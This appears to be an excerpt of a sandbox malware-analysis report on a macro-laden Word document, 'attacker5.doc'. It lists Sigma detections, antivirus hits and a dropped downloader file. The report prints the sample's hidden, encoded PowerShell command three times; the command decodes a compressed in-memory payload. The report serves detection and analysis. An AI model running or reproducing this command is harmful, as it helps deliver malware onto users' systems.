    Sigma detected: Suspicious PowerShell CmdlineShow sources
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEo
    Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command LinesShow sources
    Source: Process startedAuthor: John Lambert (rule): Data: Command: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEo
    Sigma detected: Non Interactive PowerShellShow sources
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzAHYANwBuADMAWQA0AG4ANQB3AGMAMQB1AGcAQwArAEo

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: attacker5.docVirustotal: Detection: 49%Perma Link
    Source: attacker5.docMetadefender: Detection: 40%Perma Link
    Source: attacker5.docReversingLabs: Detection: 45%
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: attacker5.docAvira: detected
    Antivirus detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMPAvira: detection malicious, Label: HEUR/Macro.Downloader.YPA.Gen
    Machine Learning detection for sampleShow sources
    Source: attacker5.docJoe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior